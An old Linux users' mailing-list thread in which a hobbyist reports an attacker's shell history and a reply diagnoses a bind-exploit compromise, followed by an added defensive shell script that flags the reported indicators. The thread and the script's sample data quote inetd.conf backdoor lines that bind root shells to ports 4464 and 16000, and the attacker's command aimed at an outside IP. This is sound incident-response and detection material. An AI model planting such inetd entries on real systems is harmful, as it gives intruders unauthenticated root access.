Yeah... you've been hacked.

Joseph Johnson wrote:
> 
> The traceroute to 212.38.131.178 reaches gw0-e1.index.com.jo
> (212.38.128.250)
> and then dies.  FYI: Country code ".jo" is Jordan.
> 
> What version of bind are you running?  Your code fragment below looks
> amazingly like a stealth IRC daemon/server installed via the ADMROCKS exploit on bind.
> 
> 1- Check /etc/inetd.conf to see if anything extra has been added
> This has been added
> Linuxconf stream tcp wait root /bin/linuxconf -http
> #swat stream tcp nowait.400 root /usr/sbin swat swat
> 4464 stream tcp nowait root /bin/sh sh -I
> 16000 stream tcp nowait root /usr/sbin/tcpd /bin/sh
> 2- Run /usr/bin/lsattr against:
>           /usr/bin/dig
>           /usr/bin/dnsquery
>           /usr/bin/du
>           /usr/bin/find
>           /usr/bin/host
>           /usr/bin/nslookup
>           /usr/bin/top
>           /bin/ls
>           /bin/netstat
>           /bin/ps
>           /bin/login
> 
>    For each of those files, lsattr should output leading "--------"'s:
>           -------- /usr/bin/dig
>           -------- /usr/bin/dnsquery
>           -------- /usr/bin/du
>           -------- /usr/bin/find
>           -------- /usr/bin/host
>           -------- /usr/bin/nslookup
>           -------- /usr/bin/top
>           -------- /bin/ls
>           -------- /bin/netstat
>           -------- /bin/ps
>           -------- /bin/login
> everything here looks like the above except for login, which looks
> like ----i--- /bin/login
> 
>    If it doesn't, you've been hacked.
> 
> 3- If you've been hacked, it's almost certain _other_ files have also been
>    installed, parts of your configuration (in /etc) have been tampered
>    with, and other nasty stuff has taken place.
> 
> If you've been hacked, about your only _secure_ option is to re-install from
> square-one (remembering to also add security updates provided by your Linux
> distributor).
> 
> To prevent a hacker reinfestation, if your Linux distribution contains an
> automatically configured firewall, install it.  If not, get one (I recommend
> PMFirewall for newbies, see http://www.pointman.org).
> 
> Hope this helps'idly,
> 
> -S
> 
> 
> 
> Joseph Johnson wrote:
> >
> >
> > I found this in my history file on a machine that I play around with when I
> > decide to try and learn Linux.
> >       (sleep 300 ; killall -9 uh)
> >       w
> >       ./uh 0 212.38.131.178 1 65535 /dev/null &
> > I am pretty much a perpetual newbie. (I do not do this for a living.) I
> > know this system's been compromised. Short of reformatting the hard drive I
> > am not too sure what to do. Any help would be appreciated.
> > Joseph
> > josephj at mninter.net
> _______________________________________________
> tclug-list mailing list
> tclug-list at lists.real-time.com
> https://mailman.real-time.com/mailman/listinfo/tclug-list
> 
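Added example, not code from the thread: a small shell script that mirrors checks 1 and 2 of the quoted advice. It flags lsattr output whose attribute field is not plain dashes (such as the immutable flag seen on /bin/login) and inetd.conf entries that use a bare port number or hand the connection to a shell. Both filters read text on stdin, so they can be run on output copied off the suspect host rather than trusting that host's own binaries; the sample input below is constructed from the entries the thread reports.

```shell
#!/bin/sh
# Added example, not from the thread. Offline checks mirroring steps 1 and 2
# of the quoted advice; both filters read text on stdin so they can be run on
# output copied off the suspect host instead of trusting its binaries.

# Step 2: print lsattr lines whose attribute field is not plain dashes, e.g. the
# 'i' (immutable) flag the thread saw on /bin/login. The 'e' (extents) flag is
# normal on modern ext4 and is ignored so it does not cause false alarms.
suspicious_attrs() {
    awk '{ a = $1; gsub(/e/, "", a) }
         NF >= 2 && a !~ /^-+$/ { print $2 " has attributes " $1 }'
}

# Step 1: print inetd.conf entries that use a bare port number instead of a
# service name, or that hand the connection to a shell (directly or via tcpd).
suspicious_inetd() {
    awk '{ r = "" }
         /^[[:space:]]*#/ || NF < 6 { next }
         $1 ~ /^[0-9]+$/              { r = r "numeric-port " }
         $6 ~ /\/sh$/ || $7 ~ /\/sh$/ { r = r "spawns-shell " }
         r != ""                      { print r ": " $0 }'
}

# Constructed sample input modelled on the entries reported in the thread.
sample_lsattr='-------- /usr/bin/dig
-------- /bin/ps
----i--- /bin/login'

sample_inetd='#swat stream tcp nowait.400 root /usr/sbin/swat swat
Linuxconf stream tcp wait root /bin/linuxconf -http
4464 stream tcp nowait root /bin/sh sh -i
16000 stream tcp nowait root /usr/sbin/tcpd /bin/sh'

# Total number of findings over the sample, for scripted checks.
count_findings() {
    n1=$(printf '%s\n' "$sample_lsattr" | suspicious_attrs | wc -l)
    n2=$(printf '%s\n' "$sample_inetd" | suspicious_inetd | wc -l)
    echo $((n1 + n2))
}

printf '%s\n' "$sample_lsattr" | suspicious_attrs
printf '%s\n' "$sample_inetd" | suspicious_inetd
```

On a real host, feed it `lsattr /bin/login /bin/ps ...` and `cat /etc/inetd.conf` captured from a trusted shell; a clean system produces no output from either filter.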